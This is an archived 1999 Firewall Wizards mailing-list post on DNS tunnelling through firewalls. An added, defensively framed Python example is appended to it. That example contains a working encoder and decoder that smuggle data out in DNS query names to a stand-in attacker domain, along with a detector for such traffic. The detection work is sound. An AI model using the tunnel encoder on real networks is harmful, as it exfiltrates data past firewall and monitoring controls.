Firewall Wizards mailing list archives
Re: dns outbound
From: "Matt McClung" <mmcclung () ndwcorp com>
Date: Tue, 18 May 1999 12:55:33 -0600
So this implies a misconfiguration of a firewall in some cases... One argument would be that your firewall should only allow outgoing DNS traffic from your internal DNS server (ignoring the fact that it could be spoofed), and I always advocate an internal HTTP/FTP/etc. proxy server and an associated firewall ruleset to control outbound access. I will acknowledge that this won't cover all solutions, but it will suffice for a very large percentage of incidents. The tunneled virus is a very scary thing, and can't be far off!

Matt McClung
Network Security Consultant
Net.Works, Inc.
mmcclung () ndwcorp com
801-595-6200

----- Original Message -----
From: Marcus J. Ranum <mjr () clark net>
To: Ryan Russell <Ryan.Russell () sybase com>; Deepak Vaidya <dvaidya () clark net>
Cc: <firewall-wizards () nfr net>
Sent: Tuesday, May 18, 1999 6:14 AM
Subject: Re: dns outbound
Ryan Russell wrote:
> Another claimed that one of his users was able to surf the web without having to authenticate on the way out, via the DNS rule.

If you have access to an external system, someplace, you can use DNS packets to contain IP packets, or you can set up an application-level proxy that tunnels over DNS packets. Kind of a lot of work, but a technically knowledgeable person behind a firewall that he/she didn't like could do it easily enough.

This is a basic problem with firewalls: so much stuff can be pushed back and forth through them that they're very easy to tunnel through.

What scares me is the (obvious) implication of a "firewall-aware" tunnelling trojan horse/virus that opens outgoing connections via HTTP or other protocols that firewalls typically allow.

mjr.
--
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
work - http://www.nfr.net
home - http://www.clark.net/pub/mjr
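The mechanism Marcus describes (carrying data in DNS packets) and the detection problem behind Matt's "tunneled virus" worry, in working code. This is an added example and is not code from anyone in the thread: the sender side packs bytes into query names under an attacker-controlled domain, the receiver side reassembles them, and a small detector scores a query log by registered domain. The domain `t.attacker.example`, the log format, the sample log lines and the thresholds are all constructed assumptions for this example.

```python
"""Added example (not from the thread): how a DNS tunnel smuggles data out in
query names, and a detector that flags that traffic in a DNS query log.
Domain names, log lines and thresholds are assumptions, not from the post."""
import base64
import hashlib
import math
from collections import defaultdict

MAX_LABEL = 63    # RFC 1035: a label is at most 63 octets
MAX_QNAME = 253   # practical limit for a name in presentation form


def encode_payload(data: bytes, domain: str, per_query: int = 3) -> list[str]:
    """Tunnel sender: pack bytes into query names under `domain`.

    base32 is used because DNS labels are case-insensitive (a resolver may fold
    case, which would corrupt base64). A 4-digit sequence label lets the
    receiver reorder queries that arrive out of order."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    qnames = []
    for seq, i in enumerate(range(0, len(labels), per_query)):
        name = ".".join([f"{seq:04d}", *labels[i:i + per_query], domain])
        if len(name) > MAX_QNAME:
            raise ValueError("per_query too large for this domain")
        qnames.append(name)
    return qnames


def decode_payload(qnames: list[str], domain: str) -> bytes:
    """Tunnel receiver (the attacker's authoritative server): reassemble bytes."""
    suffix = "." + domain
    chunks = {}
    for q in qnames:
        if not q.endswith(suffix):
            raise ValueError(f"unexpected name {q!r}")
        labels = q[:-len(suffix)].split(".")
        chunks[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding we stripped
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for the empty string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registered domain. A real
    # detector would consult the public suffix list (co.uk, com.au, ...).
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def score_queries(log_lines, min_queries=5, min_unique_ratio=0.9,
                  min_avg_len=60, min_entropy=3.5):
    """Group a query log by registered domain and flag tunnel-like domains.

    Constructed log format: "<time> <client> <qname> <qtype>". A tunnel yields
    many distinct, long, high-entropy names under one domain; normal browsing
    repeats a small set of short, dictionary-like names."""
    by_domain = defaultdict(list)
    for line in log_lines:
        _time, _client, qname, _qtype = line.split()
        by_domain[registered_domain(qname)].append(qname.lower())
    report = {}
    for dom, names in by_domain.items():
        subs = [n[:-len(dom)].rstrip(".").replace(".", "") for n in names]
        ratio = len(set(names)) / len(names)
        avg_len = sum(map(len, names)) / len(names)
        entropy = sum(map(shannon_entropy, subs)) / len(subs)
        flagged = (len(names) >= min_queries and ratio >= min_unique_ratio
                   and avg_len >= min_avg_len and entropy >= min_entropy)
        report[dom] = {"ratio": ratio, "avg_len": avg_len,
                       "entropy": entropy, "flagged": flagged}
    return report


# Constructed sample data: ordinary lookups, plus a tunnel carrying 512 bytes
# of pseudo-random payload under an assumed attacker-controlled domain.
BENIGN_LOG = [
    "10:00:01 10.1.2.3 www.example.com A",
    "10:00:02 10.1.2.3 mail.example.com MX",
    "10:00:03 10.1.2.3 www.example.com A",
    "10:00:04 10.1.2.3 cdn.example.com A",
    "10:00:05 10.1.2.3 example.com A",
]
PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
TUNNEL_DOMAIN = "t.attacker.example"
TUNNEL_QNAMES = encode_payload(PAYLOAD, TUNNEL_DOMAIN)
TUNNEL_LOG = [f"10:01:{i:02d} 10.1.2.9 {q} TXT" for i, q in enumerate(TUNNEL_QNAMES)]

if __name__ == "__main__":
    assert decode_payload(TUNNEL_QNAMES, TUNNEL_DOMAIN) == PAYLOAD
    for dom, r in score_queries(BENIGN_LOG + TUNNEL_LOG).items():
        print(f"{dom:20} unique={r['ratio']:.2f} len={r['avg_len']:6.1f} "
              f"H={r['entropy']:.2f} flagged={r['flagged']}")
```

Two caveats worth keeping in mind with this. First, restricting outbound port 53 to the internal resolver, as Matt suggests, does not by itself stop this tunnel: the internal resolver happily recurses the attacker's names to the attacker's authoritative server, so the detection has to run on the resolver's own query log (which the rule at least guarantees is complete). Second, the heuristics produce false positives on legitimate services that encode data in names (antivirus hash lookups, DNSBL queries, some CDNs), so treat a flagged domain as something to allowlist or investigate, not to block automatically.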
Current thread:
- Re: dns outbound, (continued)
- Re: dns outbound Lance Spitzner (May 17)
- Re: dns outbound Larry Chin (May 17)
- RE: dns outbound Thomas Crowe (May 18)
- Re: dns outbound Joseph S D Yao (May 17)
- Re: dns outbound David Goldsmith (May 17)
- RE: dns outbound Buckley, Neil (May 17)
- Re: dns outbound Ryan Russell (May 17)
- Re: dns outbound Marcus J. Ranum (May 18)
- Re: dns outbound chuck (May 18)
- Re: dns outbound Ge' Weijers (May 19)
- Re: dns outbound Matt McClung (May 18)
- Re: dns outbound Darren Reed (May 18)
- Re: dns outbound Bennett Todd (May 19)
- Re: dns outbound Marcus J. Ranum (May 18)
- Re: dns outbound Deepak Vaidya (May 17)
- Re: dns outbound wyllys (May 18)
- Re: dns outbound David Gillett (May 19)
- Re: dns outbound wyllys (May 21)
- Re: dns outbound Bennett Todd (May 19)